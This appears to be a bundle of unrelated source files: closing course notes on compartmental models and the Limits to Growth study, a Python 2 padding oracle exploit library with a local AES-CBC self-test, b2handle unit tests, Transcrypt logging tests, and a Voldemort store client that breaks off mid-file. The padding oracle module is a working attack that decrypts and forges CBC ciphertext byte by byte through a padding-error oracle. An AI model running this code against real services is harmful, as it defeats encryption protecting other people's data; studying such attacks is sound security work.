## Demo Code
"""
@ok
def _diapers1():
printm(Diapers().run())
"""## Appendix
### Appendix A.: Debugging Compartmental Models
Never underestimate the effort associated with commissioning a model.
+ The experience is rarely "Eureka!" but more like "huh, that's odd".
+ Repeat for several weeks.
So start small and get experience with the parts before trying to get lessons from the whole.
+ Never too early to start your modeling.
FYI: Cannot debug complex emergent behavior.
+ Instead, debug the parts then trust the whole reflects the interactions of
the parts:
+ Write down ten micro-expectations of the simulation
+ Little effects, involving just a few variables
+ Check of these are happening.
### Appendix B.: Writing Compartmental Models
Hints and Tips
#### Method one: use linguistic clues.
Talk to client. Record the session. Look for clues in that conversation. e.g

For more on these linguistic clues, see
+ [Stock Flow Diagram Making with Incomplete Information
about Time Properties of Variables ](http://www.systemdynamics.org/conferences/2006/proceed/papers/TAKAH173.pdf)
+ [Translation from Natural Language to Stock Flow Diagrams ](http://www.systemdynamics.org/conferences/2005/proceed/papers/TAKAH137.pdf)
#### Method Two : Causal Model Refinement
As someone said, first we write down the intuition, then we write down the Xs and the Ys.
So here's a vague causal diagram:

Which you can sort of see can get translated into:

Now imagine a bigger example:

For more on this approach, see:
+ [Introduction to System Dynamics](http://unbox.org/doc/optimalML/introSystemDynamics.pdf)
+ [DEVELOPING SYSTEM DYNAMICS MODELS FROM CAUSAL LOOP DIAGRAMS](http://webmail.inb.uni-luebeck.de/inb-publications/pdfs/BiVoBeHaSv04.pdf)
### Appendix C.: Compartmental Models Saving the Whole World
Reference: Geletko, D.; Menzies, T., "Model-based software testing via incremental treatment learning," in Software Engineering Workshop, 2003. Proceedings. 28th Annual NASA Goddard , vol., no., pp.82-90, 3-4 Dec. 2003
doi: 10.1109/SEW.2003.1270729
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=1270729&isnumber=28448
The infamous [Limits to Growth](http://www.donellameadows.org/wp-content/userfiles/Limits-to-Growth-digital-scan-version.pdf) study. 12 million copies were distributed in 37 languages.
In 1972, a team of system scientists and computer
modelers studied the effects of the world's
exponentially growing population and economy. A
model was developed of the world, and it predicted
_Doom!_ for the future: no matter what we do, overshoot and collapse by 2040:

+ Widely ridiculed.
+ [From Wikipedia](https://en.wikipedia.org/wiki/The_Limits_to_Growth#Reviews): After publication some economists, scientists and political figures criticized the Limits to Growth.
+ Attacked the methodology, the computer, the conclusions, the rhetoric and the people behind the project.
+ Economists agreed that growth could not continue indefinitely, but that a natural end to growth was preferable to intervention.
+ Argues stated that technology could solve all the problems the Meadows were concerned about, but only if growth continued apace. By stopping growth too soon, the world would be "consigning billions to permanent poverty".
+ My reply is that their model was written and read more than run.
+ Their reported limits are avoidable. See below.
Here is the compartmental model it was generated
from. It consists of the classes of world
population, nonrenewable resources, food,
industrial output, and persistent pollution index
from the year range 1900 to 2100. The model is
rather complex, consisting of hundreds of variables,
comprised of the five main sectors of persistent
pollution, non-renewable resources, population,
agriculture(food produc-tion, land fertility, and
land development and loss), and economy(industrial
output, services output, and jobs).

Using the techniques of this class, me and Dustin Geletko
found mitigations that could save the world:

How did we do it? By capping family size and industrial output
1. desired completed family size normal = [0..2]
2. Industrial Capital Output Ratio 1 = [3..5]
(Here, all values are discretized 0,1,2,3,4,5,6.)
So, study ASE to save the world.
"""
|
|
# -*- coding: utf-8 -*-
'''
Padding Oracle Exploit API
~~~~~~~~~~~~~~~~~~~~~~~~~~
'''
from itertools import izip, cycle
import logging
__all__ = [
'BadPaddingException',
'PaddingOracle',
]
class BadPaddingException(Exception):
'''
Raised when a blackbox decryptor reveals a padding oracle.
This Exception type should be raised in :meth:`.PaddingOracle.oracle`.
'''
class PaddingOracle(object):
'''
Implementations should subclass this object and implement
the :meth:`oracle` method.
:param int max_retries: Number of attempts per byte to reveal a
padding oracle, default is 3. If an oracle does not reveal
itself within `max_retries`, a :exc:`RuntimeError` is raised.
'''
def __init__(self, **kwargs):
self.log = logging.getLogger(self.__class__.__name__)
self.max_retries = int(kwargs.get('max_retries', 3))
self.attempts = 0
self.history = []
self._decrypted = None
self._encrypted = None
def oracle(self, data, **kwargs):
'''
Feeds *data* to a decryption function that reveals a Padding
Oracle. If a Padding Oracle was revealed, this method
should raise a :exc:`.BadPaddingException`, otherwise this
method should just return.
A history of all responses should be stored in :attr:`~.history`,
regardless of whether they revealed a Padding Oracle or not.
Responses from :attr:`~.history` are fed to :meth:`analyze` to
help identify padding oracles.
:param bytearray data: A bytearray of (fuzzed) encrypted bytes.
:raises: :class:`BadPaddingException` if decryption reveals an
oracle.
'''
raise NotImplementedError
def analyze(self, **kwargs):
'''
This method analyzes return :meth:`oracle` values stored in
:attr:`~.history` and returns the most likely
candidate(s) that reveals a padding oracle.
'''
raise NotImplementedError
def encrypt(self, plaintext, block_size=8, iv=None, **kwargs):
'''
Encrypts *plaintext* by exploiting a Padding Oracle.
:param plaintext: Plaintext data to encrypt.
:param int block_size: Cipher block size (in bytes).
:param iv: The initialization vector (iv), usually the first
*block_size* bytes from the ciphertext. If no iv is given
or iv is None, the first *block_size* bytes will be null's.
:returns: Encrypted data.
'''
pad = block_size - (len(plaintext) % block_size)
plaintext = bytearray(plaintext + chr(pad) * pad)
self.log.debug('Attempting to encrypt %r bytes', str(plaintext))
if iv is not None:
iv = bytearray(iv)
else:
iv = bytearray(block_size)
self._encrypted = encrypted = iv
block = encrypted
n = len(plaintext + iv)
while n > 0:
intermediate_bytes = self.bust(block, block_size=block_size,
**kwargs)
block = xor(intermediate_bytes,
plaintext[n - block_size * 2:n + block_size])
encrypted = block + encrypted
n -= block_size
return encrypted
def decrypt(self, ciphertext, block_size=8, iv=None, **kwargs):
'''
Decrypts *ciphertext* by exploiting a Padding Oracle.
:param ciphertext: Encrypted data.
:param int block_size: Cipher block size (in bytes).
:param iv: The initialization vector (iv), usually the first
*block_size* bytes from the ciphertext. If no iv is given
or iv is None, the first *block_size* bytes will be used.
:returns: Decrypted data.
'''
ciphertext = bytearray(ciphertext)
self.log.debug('Attempting to decrypt %r bytes', str(ciphertext))
assert len(ciphertext) % block_size == 0, \
"Ciphertext not of block size %d" % (block_size, )
if iv is not None:
iv, ctext = bytearray(iv), ciphertext
else:
iv, ctext = ciphertext[:block_size], ciphertext[block_size:]
self._decrypted = decrypted = bytearray(len(ctext))
n = 0
while ctext:
block, ctext = ctext[:block_size], ctext[block_size:]
intermediate_bytes = self.bust(block, block_size=block_size,
**kwargs)
# XOR the intermediate bytes with the the previous block (iv)
# to get the plaintext
decrypted[n:n + block_size] = xor(intermediate_bytes, iv)
self.log.info('Decrypted block %d: %r',
n / block_size, str(decrypted[n:n + block_size]))
# Update the IV to that of the current block to be used in the
# next round
iv = block
n += block_size
return decrypted
def bust(self, block, block_size=8, **kwargs):
'''
A block buster. This method busts one ciphertext block at a time.
This method should not be called directly, instead use
:meth:`decrypt`.
:param block:
:param int block_size: Cipher block size (in bytes).
:returns: A bytearray containing the decrypted bytes
'''
intermediate_bytes = bytearray()
test_bytes = bytearray(block_size) # '\x00\x00\x00\x00...'
test_bytes.extend(block)
self.log.debug('Processing block %r', str(block))
# Work on one byte at a time, starting with the last byte
# and moving backwards
for byte_num in reversed(xrange(block_size)):
retries = 0
successful = False
# clear oracle history for each byte
self.history = []
# Break on first byte that returns an oracle, otherwise keep
# trying until we exceed the max retry attempts (default is 3)
while retries < self.max_retries and not successful:
for i in reversed(xrange(256)):
# Fuzz the test byte
test_bytes[byte_num] = i
# If a padding oracle could not be identified from the
# response, this indicates the padding bytes we sent
# were correct.
try:
self.attempts += 1
self.oracle(test_bytes[:], **kwargs)
except BadPaddingException:
# TODO
# if a padding oracle was seen in the response,
# do not go any further, try the next byte in the
# sequence. If we're in analysis mode, re-raise the
# BadPaddingException.
if self.analyze is True:
raise
else:
continue
except Exception:
self.log.exception('Caught unhandled exception!\n'
'Decrypted bytes so far: %r\n'
'Current variables: %r\n',
intermediate_bytes, self.__dict__)
raise
successful = True
current_pad_byte = block_size - byte_num
next_pad_byte = block_size - byte_num + 1
decrypted_byte = test_bytes[byte_num] ^ current_pad_byte
intermediate_bytes.insert(0, decrypted_byte)
for k in xrange(byte_num, block_size):
# XOR the current test byte with the padding value
# for this round to recover the decrypted byte
test_bytes[k] ^= current_pad_byte
# XOR it again with the padding byte for the
# next round
test_bytes[k] ^= next_pad_byte
break
if successful:
break
else:
retries += 1
else:
raise RuntimeError('Could not decrypt byte %d in %r within '
'maximum allotted retries (%d)' % (
byte_num, block, self.max_retries))
return intermediate_bytes
def xor(data, key):
'''
XOR two bytearray objects with each other.
'''
return bytearray([x ^ y for x, y in izip(data, cycle(key))])
def test():
import os
from Crypto.Cipher import AES
teststring = 'The quick brown fox jumped over the lazy dog'
def pkcs7_pad(data, blklen=16):
if blklen > 255:
raise ValueError('Illegal block size %d' % (blklen, ))
pad = (blklen - (len(data) % blklen))
return data + chr(pad) * pad
class PadBuster(PaddingOracle):
def oracle(self, data):
_cipher = AES.new(key, AES.MODE_CBC, str(iv))
ptext = _cipher.decrypt(str(data))
plen = ord(ptext[-1])
padding_is_good = (ptext[-plen:] == chr(plen) * plen)
if padding_is_good:
return
raise BadPaddingException
padbuster = PadBuster()
key = os.urandom(AES.block_size)
iv = bytearray(os.urandom(AES.block_size))
print "Testing padding oracle exploit in DECRYPT mode"
cipher = AES.new(key, AES.MODE_CBC, str(iv))
data = pkcs7_pad(teststring, blklen=AES.block_size)
ctext = cipher.encrypt(data)
decrypted = padbuster.decrypt(ctext, block_size=AES.block_size, iv=iv)
print "Key: %r" % (key, )
print "IV: %r" % (iv, )
print "Plaintext: %r" % (data, )
print "Ciphertext: %r" % (ctext, )
print "Decrypted: %r" % (str(decrypted), )
print "\nRecovered in %d attempts\n" % (padbuster.attempts, )
assert decrypted == data, \
'Decrypted data %r does not match original %r' % (
decrypted, data)
print "Testing padding oracle exploit in ENCRYPT mode"
cipher2 = AES.new(key, AES.MODE_CBC, str(iv))
encrypted = padbuster.encrypt(teststring, block_size=AES.block_size)
decrypted = cipher2.decrypt(str(encrypted))[AES.block_size:]
decrypted = decrypted.rstrip(decrypted[-1])
print "Key: %r" % (key, )
print "IV: %r" % (iv, )
print "Plaintext: %r" % (teststring, )
print "Ciphertext: %r" % (str(encrypted), )
print "Decrypted: %r" % (str(decrypted), )
print "\nRecovered in %d attempts" % (padbuster.attempts, )
assert decrypted == teststring, \
'Encrypted data %r does not decrypt to %r, got %r' % (
encrypted, teststring, decrypted)
if __name__ == '__main__':
test()
|
|
"""Testing methods that normally need Handle server read access,
by providing a handle record to replace read access."""
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import json
import b2handle
from b2handle.handleclient import EUDATHandleClient
from b2handle.utilhandle import check_handle_syntax
from past.builtins import long
# Load some data that is needed for testing
PATH_RES = b2handle.util.get_neighbour_directory(__file__, 'resources')
RECORD = json.load(open(PATH_RES+'/handlerecord_for_reading_PUBLIC.json'))
RECORD_WITH = json.load(open(PATH_RES+'/handlerecord_with_10320LOC_PUBLIC.json'))
RECORD_WITHOUT = json.load(open(PATH_RES+'/handlerecord_without_10320LOC_PUBLIC.json'))
RECORD_WITH_EMPTY = json.load(open(PATH_RES+'/handlerecord_with_empty_10320LOC_PUBLIC.json'))
class EUDATHandleClientReadaccessFakedTestCase(unittest.TestCase):
'''Testing methods for retrieving values and indices.'''
def setUp(self):
self.inst = EUDATHandleClient()
def tearDown(self):
pass
# get_value_from_handle
def test_get_value_from_handle_normal(self):
"""Test retrieving a specific value from a handle record."""
handlerecord = RECORD
handle = RECORD['handle']
val = self.inst.get_value_from_handle(handle,
'TEST1',
handlerecord)
self.assertEquals(val, 'val1',
'The value of "TEST1" should be "val1".')
def test_get_value_from_handle_inexistentvalue(self):
"""Test retrieving an inexistent value from a handle record."""
handlerecord = RECORD
handle = handlerecord['handle']
val = self.inst.get_value_from_handle(handle,
'TEST100',
handlerecord)
self.assertIsNone(val,
'The value of "TEST100" should be None.')
def test_get_value_from_handle_HS_ADMIN(self):
"""Test retrieving an HS_ADMIN value from a handle record."""
handlerecord = RECORD
handle = handlerecord['handle']
val = self.inst.get_value_from_handle(handle,
'HS_ADMIN',
handlerecord)
self.assertIn('handle', val,
'The HS_ADMIN has no entry "handle".')
self.assertIn('index', val,
'The HS_ADMIN has no entry "index".')
self.assertIn('permissions', val,
'The HS_ADMIN has no entry "permissions".')
syntax_ok = check_handle_syntax(val['handle'])
self.assertTrue(syntax_ok,
'The handle in HS_ADMIN is not well-formatted.')
self.assertIsInstance(val['index'], (int, long),
'The index of the HS_ADMIN is not an integer.')
self.assertEqual(str(val['permissions']).replace('0','').replace('1',''), '',
'The permission value in the HS_ADMIN contains not just 0 and 1.')
def test_get_value_from_handle_duplicatekey(self):
"""Test retrieving a value of a duplicate key."""
handlerecord = RECORD
handle = handlerecord['handle']
val = self.inst.get_value_from_handle(handle,
'TESTDUP',
handlerecord)
self.assertIn(val, ("dup1", "dup2"),
'The value of the duplicate key "TESTDUP" should be "dup1" or "dup2".')
# retrieve_handle_record
def test_retrieve_handle_record_normal(self):
handlerecord = RECORD
handle = handlerecord['handle']
dict_record = self.inst.retrieve_handle_record(handle, handlerecord)
self.assertIn('TEST1', dict_record,
'Key "test1" not in handlerecord dictionary!')
self.assertIn('TEST2', dict_record,
'Key "test2" not in handlerecord dictionary!')
self.assertIn('TESTDUP', dict_record,
'Key "testdup" not in handlerecord dictionary!')
self.assertIn('HS_ADMIN', dict_record,
'Key "HS_ADMIN" not in handlerecord dictionary!')
self.assertEqual(dict_record['TEST1'], 'val1',
'The value of "TEST1" is not "val1.')
self.assertEqual(dict_record['TEST2'], 'val2',
'The value of "TEST2" is not "val2.')
self.assertIn(dict_record['TESTDUP'], ("dup1", "dup2"),
'The value of the duplicate key "TESTDUP" should be "dup1" or "dup2".')
self.assertIn('permissions', dict_record['HS_ADMIN'],
'The HS_ADMIN has no permissions: '+dict_record['HS_ADMIN'])
self.assertEqual(len(dict_record), 4,
'The record should have a length of 5 (as the duplicate is ignored.')
# get_handlerecord_indices_for_key
def test_get_indices_for_key_normal(self):
"""Test getting the indices for a specific key."""
handlerecord = RECORD
handle = handlerecord['handle']
indices = self.inst.get_handlerecord_indices_for_key('TEST1', handlerecord['values'])
self.assertEqual(len(indices),1,
'There is more or less than 1 index!')
self.assertEqual(indices[0], 3,
'The index of "test1" is not 3.')
def test_get_indices_for_key_duplicatekey(self):
"""Test getting the indices for a duplicate key."""
handlerecord = RECORD
handle = handlerecord['handle']
indices = self.inst.get_handlerecord_indices_for_key('TESTDUP', handlerecord['values'])
self.assertEqual(len(indices),2,
'There is more or less than 2 indices!')
self.assertIn(5, indices,
'5 is not in indices for key "testdup".')
self.assertIn(6, indices,
'6 is not in indices for key "testdup".')
def test_get_indices_for_key_inexistentkey(self):
"""Test getting the indices for an inexistent key."""
handlerecord = RECORD
handle = handlerecord['handle']
indices = self.inst.get_handlerecord_indices_for_key('test100', handlerecord['values'])
self.assertEqual(len(indices),0,
'There is more than 0 index!')
self.assertEqual(indices,[],
'Indices should be an empty list!')
# is_10320LOC_empty
def test_is_10320LOC_empty_notempty(self):
"""Test if presence of 10320/LOC is detected."""
handlerecord = RECORD_WITH
handle = handlerecord['handle']
answer = self.inst.is_10320LOC_empty(handle, handlerecord)
self.assertFalse(answer,
'The record contains a 10320/LOC, but the is_empty does not return False.')
def test_is_10320LOC_empty_no10320LOC(self):
"""Test if absence of 10320/LOC is detected."""
handlerecord = RECORD_WITHOUT
handle = handlerecord['handle']
answer = self.inst.is_10320LOC_empty(handle, handlerecord)
self.assertTrue(answer,
'The record contains no 10320/LOC, but the is_empty does not return True.')
def test_is_10320LOC_empty_empty10320LOC(self):
"""Test if emptiness of 10320/LOC is detected."""
handlerecord = RECORD_WITH_EMPTY
handle = handlerecord['handle']
answer = self.inst.is_10320LOC_empty(handle, handlerecord)
self.assertTrue(answer,
'The record contains an empty 10320/LOC, but the is_empty does not return True.')
# is_URL_contained_in_1302loc
def test_is_URL_contained_in_10320LOC_true(self):
"""Test if presence of URL is found in 10320/LOC."""
handlerecord = RECORD_WITH
handle = handlerecord['handle']
answer = self.inst.is_URL_contained_in_10320LOC(handle,
'http://foo.bar',
handlerecord)
val = self.inst.get_value_from_handle(handle, '10320/LOC', handlerecord)
self.assertTrue(answer,
'The URL exists in the 10320/LOC, and still the method does not return True:\n'+str(val))
def test_is_URL_contained_in_10320LOC_false(self):
"""Test if absence of URL is detected in existing 10320/LOC."""
handlerecord = RECORD_WITH
handle = handlerecord['handle']
answer = self.inst.is_URL_contained_in_10320LOC(handle,
'http://bar.bar',
handlerecord)
self.assertFalse(answer,
'The 10320/LOC does not contain the URL, and still the method does not return False.')
def test_is_URL_contained_in_inexistent_10320LOC(self):
"""Test if absence of URL is detected if 10320/LOC does not exist."""
handlerecord = RECORD_WITHOUT
handle = handlerecord['handle']
answer = self.inst.is_URL_contained_in_10320LOC(handle,
'http://whatever.foo',
handlerecord)
self.assertFalse(answer,
'The 10320/LOC does not exist, and still the method does not return False.')
def test_is_URL_contained_in_empty_10320LOC(self):
"""Test if absence of URL is detected if 10320/LOC is empty."""
handlerecord = RECORD_WITH_EMPTY
handle = handlerecord['handle']
answer = self.inst.is_URL_contained_in_10320LOC(handle,
'http://whatever.foo',
handlerecord)
self.assertFalse(answer,
'The 10320/LOC is empty, and still the method does not return False.')
|
|
from org.transcrypt.stubs.browser import __pragma__, __envir__
import logging
from utils import TestHandler, resetLogging
def logger_basics(test):
resetLogging()
logger = logging.getLogger("tester")
test.check(logger.name)
test.check(logger.level)
test.check(logger.hasHandlers())
# level set methods
test.check(logger.getEffectiveLevel())
logger.setLevel(10)
test.check(logger.level)
testLevel = "USERDEFLEVEL"
test.check(test.expectException(lambda : logger.setLevel(testLevel)))
test.check(logging.getLevelName(testLevel))
for i in range(0,50,5):
test.check(logging.getLevelName(i))
logging.addLevelName(35, testLevel)
test.check(logging.getLevelName(testLevel))
for i in range(0,50,5):
test.check(logging.getLevelName(i))
for i in range(0,50,5):
test.check(logger.isEnabledFor(i))
hdlr = TestHandler(test, 30)
fmt = logging.Formatter(style="{")
hdlr.setFormatter(fmt)
logger.addHandler(hdlr)
test.check(logger.hasHandlers())
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
logger.setLevel(0)
# @note - Transcrypt only has the '.format()' method for
# string formatting but python's logging module has a
# fixed mode using the old-style % formating concept
# this is obviously non-optimal from a testing perspective
# as well as form a interop perspective...
if __envir__.executor_name == __envir__.transpiler_name:
logger.debug("This is a debug msg {}", 1)
else:
logger.debug("This is a debug msg %d", 1)
if __envir__.executor_name == __envir__.transpiler_name:
logger.info("This is an info message: {}", "blarg")
else:
logger.info("This is an info message: %s", "blarg")
if __envir__.executor_name == __envir__.transpiler_name:
logger.warning("This is a {} warning message in the {}", "blue", "barn")
else:
logger.warning("This is a %s warning message in the %s", "blue", "barn")
if __envir__.executor_name == __envir__.transpiler_name:
logger.error("This is an error message: {} {} {}", 3, "23", 4)
else:
logger.error("This is an error message: %d %s %d", 3, "23", 4)
logger.critical("The house is on fire")
# Test the handler level change
hdlr.setLevel(30)
logger.debug("This is a debug msg {}", 1)
logger.info("This is an info message: {}", "blarg")
if __envir__.executor_name == __envir__.transpiler_name:
logger.warning("This is a {} warning message in the {}", "blue", "barn")
else:
logger.warning("This is a %s warning message in the %s", "blue", "barn")
if __envir__.executor_name == __envir__.transpiler_name:
logger.error("This is an error message: {} {} {}", 3, "23", 4)
else:
logger.error("This is an error message: %d %s %d", 3, "23", 4)
logger.critical("The house is on fire")
def logging_api_tests(test):
resetLogging()
logger = logging.getLogger()
logger.setLevel(20)
hdlr = TestHandler(test, 30)
fmt = logging.Formatter(style="{")
hdlr.setFormatter(fmt)
logger.addHandler(hdlr)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
logger.setLevel(40)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
hdlr.setLevel(20)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
hdlr.setLevel(39)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
hdlr.setLevel(41)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
hdlr.setLevel(40)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
logger.setLevel(39)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
def formatter_tests(test):
""" This function contains some tests of the formatter objects
"""
resetLogging()
logger = logging.getLogger("fmttest")
logger.setLevel(10)
hdlr = TestHandler(test, 30)
fmt = logging.Formatter("{levelname}:{name}:{message}", style="{")
test.check(fmt.usesTime())
hdlr.setFormatter(fmt)
logger.addHandler(hdlr)
hdlr.setLevel(30)
test.check(hdlr.name)
hdlr.name = "Asdf"
test.check(hdlr.name)
test.check(hdlr.level)
test.check(logger.hasHandlers())
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
hdlr.setLevel(0)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
def console_test(test):
""" @note- this test will only generate minimal
autotester results but can be manually inspected in the
console.log
"""
resetLogging()
logger = logging.getLogger("consoleTest")
logger.setLevel(10)
hdlr = TestHandler(test, 30)
fmt = logging.Formatter("{name}:{message}", style="{")
test.check(fmt.usesTime())
hdlr.setFormatter(fmt)
hdlr.setLevel(20)
logger.addHandler(hdlr)
shdlr = logging.StreamHandler()
shdlr.setFormatter(fmt)
shdlr.setLevel(20)
logger.addHandler(shdlr)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
shdlr.setLevel(10)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
shdlr.setLevel(40)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
def placeholder_testing(test):
""" This test is intended to manage placeholding of loggers
For example creating "asdf.qwer.eer" when "asdf.qwer" does not
exit
"""
logger = logging.getLogger("phtest.middle.testme")
logger.setLevel(10)
hdlr = TestHandler(test, 5)
fmt = logging.Formatter("{levelname}:{name}:{message}", style="{")
hdlr.setFormatter(fmt)
logger.addHandler(hdlr)
logger.error("Gen a message")
log2 = logging.getLogger("phtest.middle")
log2.setLevel(10)
log2.addHandler(hdlr)
log2.info("This is another message")
log3 = logging.getLogger("phtest")
log3.setLevel(10)
log3.addHandler(hdlr)
log3.info("Yet another message")
# Now let's go the opposite way
logger = logging.getLogger("mngtest")
logger.setLevel(10)
logger.addHandler(hdlr)
logger.error("Gen a message 2 - the generating")
log2 = logging.getLogger("mngtest.mid")
log2.setLevel(10)
log2.addHandler(hdlr)
log2.info("This is another message 2 - the anothering")
log3 = logging.getLogger("mngtest.mid.end")
log3.setLevel(10)
log3.addHandler(hdlr)
log3.info("Yet another message 2 - the whatever...")
def run(test):
""" These are general logging test for the Logger class and
associated classes. This does not cover the configuration module.
"""
logger_basics(test)
logging_api_tests(test)
formatter_tests(test)
console_test(test)
placeholder_testing(test)
|
|
import socket
import struct
import time
import sys
import re
import random
import logging
import protocol.voldemort_client_pb2 as protocol
from xml.dom import minidom
from datetime import datetime
import serialization
##################################################################
# A Voldemort client. Each client uses a single connection to one
# Voldemort server. All routing is done server-side.
##################################################################
## Extract all the child text of the given element
def _extract_text(elm):
if elm.nodeType == minidom.Node.TEXT_NODE:
return elm.data
elif elm.nodeType == minidom.Node.ELEMENT_NODE:
text = ""
for child in elm.childNodes:
text += _extract_text(child)
return text
## Get a single child from the element, if there are multiple children, explode.
def _child(elmt, name, required=True):
children = [child for child in elmt.childNodes
if child.nodeType == minidom.Node.ELEMENT_NODE and child.tagName == name]
if not children:
if required:
raise VoldemortException("No child '%s' for element '%s'." % (name, elmt.nodeName))
else:
return None
if len(children) > 1:
raise VoldemortException("Multiple children '%s' for element '%s'." % (name, elmt.nodeName))
return children[0]
## Get the child text of a single element
def _child_text(elmt, name, required=True, default=None):
if default:
required = False
child = _child(elmt, name, required=required)
if not child:
return default
return _extract_text(child)
def _int_or_none(s):
if s is None:
return s
return int(s)
##################################################################
# A node class representing a single voldemort server in the
# cluster. The cluster itself is just a list of nodes
##################################################################
class Node:
"""A Voldemort node with the appropriate host and port information for contacting that node"""
def __init__(self, id, host, socket_port, http_port, partitions, is_available = True, last_contact = None):
self.id = id
self.host = host
self.socket_port = socket_port
self.http_port = http_port
self.partitions = partitions
self.is_available = True
if not last_contact:
self.last_contact = time.clock()
def __repr__(self):
return 'node(id = ' + str(self.id) + ', host = ' + self.host + ', socket_port = ' + str(self.socket_port) + \
', http_port = ' + str(self.http_port) + ', partitions = ' + ', '.join(map(str, self.partitions)) + ')'
@staticmethod
def parse_cluster(xml):
"""Parse the cluster.xml file and return a dictionary of the nodes in the cluster indexed by node id """
doc = minidom.parseString(xml)
nodes = {}
for curr in doc.getElementsByTagName('server'):
id = int(_child_text(curr, 'id'))
host = _child_text(curr, 'host')
http_port = int(_child_text(curr, 'http-port'))
socket_port = int(_child_text(curr, 'socket-port'))
partition_str = _child_text(curr, 'partitions')
partitions = [int(p) for p in re.split('[\s,]+', partition_str)]
nodes[id] = Node(id = id, host = host, socket_port = socket_port, http_port = http_port, partitions = partitions)
return nodes
class Store:
def __init__(self, store_node):
self.name = _child_text(store_node, "name")
self.persistence = _child_text(store_node, "persistence")
self.routing = _child_text(store_node, "routing")
self.routing_strategy = _child_text(store_node, "routing-strategy", default="consistent-routing")
self.replication_factor = int(_child_text(store_node, "replication-factor"))
self.required_reads = int(_child_text(store_node, "required-reads"))
self.preferred_reads = _int_or_none(_child_text(store_node, "preferred-reads", required=False))
self.required_writes = int(_child_text(store_node, "required-writes"))
self.preferred_writes = _int_or_none(_child_text(store_node, "preferred-writes", required=False))
key_serializer_node = _child(store_node, "key-serializer")
try:
self.key_serializer_type = _child_text(key_serializer_node, "type")
self.key_serializer = self._create_serializer(self.key_serializer_type, key_serializer_node)
except serialization.SerializationException, e:
logging.warn("Error while creating key serializer for store [%s]: %s" % (self.name, e))
self.key_serializer_type = "invalid"
self.key_serializer = serialization.UnimplementedSerializer("invalid")
value_serializer_node = _child(store_node, "value-serializer")
try:
self.value_serializer_type = _child_text(value_serializer_node, "type")
self.value_serializer = self._create_serializer(self.value_serializer_type, value_serializer_node)
except serialization.SerializationException, e:
logging.warn("Error while creating value serializer for store [%s]: %s" % (self.name, e))
self.value_serializer_type = "invalid"
self.value_serializer = serialization.UnimplementedSerializer("invalid")
def _create_serializer(self, serializer_type, serializer_node):
if serializer_type not in serialization.SERIALIZER_CLASSES:
return serialization.UnimplementedSerializer(serializer_type)
return serialization.SERIALIZER_CLASSES[serializer_type].create_from_xml(serializer_node)
@staticmethod
def parse_stores_xml(xml, store_name):
doc = minidom.parseString(xml)
store_nodes = doc.getElementsByTagName("store")
for store_node in store_nodes:
name = _child_text(store_node, "name")
if name == store_name:
return Store(store_node)
return None
class VoldemortException(Exception):
def __init__(self, msg, code = 1):
self.code = code
self.msg = msg
def __str__(self):
return repr(self.msg)
class StoreClient:
"""A simple Voldemort client. It is single-threaded and supports only server-side routing."""
def __init__(self, store_name, bootstrap_urls, reconnect_interval = 500, conflict_resolver = None):
self.store_name = store_name
self.request_count = 0
self.conflict_resolver = conflict_resolver
self.nodes, self.store = self._bootstrap_metadata(bootstrap_urls, store_name)
if not self.store:
raise VoldemortException("Cannot find store [%s] at %s" % (store_name, bootstrap_urls))
self.node_id = random.randint(0, len(self.nodes) - 1)
self.connection = None
self.node_id, self.connection = self._reconnect()
self.reconnect_interval = reconnect_interval
self.open = True
self.key_serializer = self.store.key_serializer
self.value_serializer = self.store.value_serializer
def _make_connection(self, host, port):
protocol = 'pb0'
logging.debug('Attempting to connect to ' + host + ':' + str(port))
connection = socket.socket()
connection.connect((host, port))
logging.debug('Connection succeeded, negotiating protocol')
connection.send(protocol)
resp = connection.recv(2)
if resp != 'ok':
raise VoldemortException('Server does not understand the protocol ' + protocol)
logging.debug('Protocol negotiation suceeded')
return connection
## Connect to a the next available node in the cluster
## returns a tuple of (node_id, connection)
def _reconnect(self):
num_nodes = len(self.nodes)
attempts = 0
new_node_id = self.node_id
self._close_socket(self.connection)
while attempts < num_nodes:
new_node_id = (new_node_id + 1) % num_nodes
new_node = self.nodes[new_node_id]
connection = None
try:
connection = self._make_connection(new_node.host, new_node.socket_port)
self.request_count = 0
return new_node_id, connection
except socket.error, (err_num, message):
logging.warn('Error connecting to node ' + str(new_node_id) + ': ' + message)
attempts += 1
# If we get here all nodes have failed us, explode
raise VoldemortException('Connections to all nodes failed.')
## Safely close the socket, catching and logging any exceptions
def _close_socket(self, socket):
try:
if socket:
socket.close()
except socket.error, exp:
logging.error('Error while closing socket: ' + str(exp))
## Check if the the number of requests made on this connection is greater than the reconnect interval.
